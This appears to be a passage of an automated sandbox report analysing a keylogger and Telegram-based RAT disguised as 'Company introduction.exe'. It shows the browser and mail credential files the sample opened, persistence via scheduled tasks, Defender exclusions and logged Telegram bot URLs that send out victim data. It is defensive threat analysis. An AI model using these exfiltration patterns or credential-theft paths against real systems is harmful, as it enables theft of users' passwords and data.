                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Users\user\Desktop\Company introduction.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Users\user\AppData\Roaming\FzXKnGk.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Users\user\AppData\Roaming\FzXKnGk.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Company introduction.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7812, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\Company introduction.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2941471703.00000000031AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2940815636.000000000344C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7812, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0000000C.00000002.2940815636.0000000003341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2941471703.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7812, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4448f78.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.FzXKnGk.exe.4405f58.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e9a600.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Company introduction.exe.4e575e0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004264000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2937919242.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1759032801.0000000004405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1733796821.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Company introduction.exe PID: 7452, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 7888, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: FzXKnGk.exe PID: 8144, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		111
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		LSASS Memory11
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		31
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares1
                Data from Local System                		3
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS31
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Software Packing                		Cached Domain Credentials1
                System Network Configuration Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591636 Sample: Company introduction.exe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 api.telegram.org 2->52 54 2 other IPs or domains 2->54 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 66 13 other signatures 2->66 8 Company introduction.exe 7 2->8         started        12 FzXKnGk.exe 5 2->12         started        signatures3 62 Tries to detect the country of the analysis system (by using the IP) 50->62 64 Uses the Telegram API (likely for C&C communication) 52->64 process4 file5 36 C:\Users\user\AppData\Roaming\FzXKnGk.exe, PE32 8->36 dropped 38 C:\Users\user\...\FzXKnGk.exe:Zone.Identifier, ASCII 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmpE629.tmp, XML 8->40 dropped 42 C:\Users\...\Company introduction.exe.log, ASCII 8->42 dropped 68 Adds a directory exclusion to Windows Defender 8->68 70 Injects a PE file into a foreign processes 8->70 14 powershell.exe 23 8->14         started        17 Company introduction.exe 15 2 8->17         started        20 schtasks.exe 1 8->20         started        72 Antivirus detection for dropped file 12->72 74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 22 FzXKnGk.exe 12->22         started        24 schtasks.exe 12->24         started        26 FzXKnGk.exe 12->26         started        signatures6 process7 dnsIp8 78 Loading BitLocker PowerShell Module 14->78 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        44 api.telegram.org 149.154.167.220, 443, 49766, 49773 TELEGRAMRU United Kingdom 17->44 46 checkip.dyndns.com 193.122.6.168, 49733, 49737, 49738 ORACLE-BMC-31898US United States 17->46 48 reallyfreegeoip.org 104.21.48.1, 443, 49734, 49735 CLOUDFLARENETUS United States 17->48 32 conhost.exe 20->32         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 34 conhost.exe 24->34         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Company introduction.exe29%VirustotalBrowse
                Company introduction.exe34%ReversingLabs
                Company introduction.exe100%AviraHEUR/AGEN.1311126
                Company introduction.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\FzXKnGk.exe100%AviraHEUR/AGEN.1311126
                C:\Users\user\AppData\Roaming\FzXKnGk.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\FzXKnGk.exe34%ReversingLabs
                C:\Users\user\AppData\Roaming\FzXKnGk.exe29%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		104.21.48.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		193.122.6.168
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          		high
                          http://checkip.dyndns.org/false
                            		high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:34:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2015/01/2025%20/%2014:14:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.fontbureau.com/designersGCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?Company introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheCompany introduction.exe, 00000000.00000002.1738085803.0000000007602000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orgCompany introduction.exe, 00000006.00000002.2941471703.000000000318A000.00000004.00000800.00020000.00000000.sdmp, FzXKnGk.exe, 0000000C.00000002.2940815636.0000000003429000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
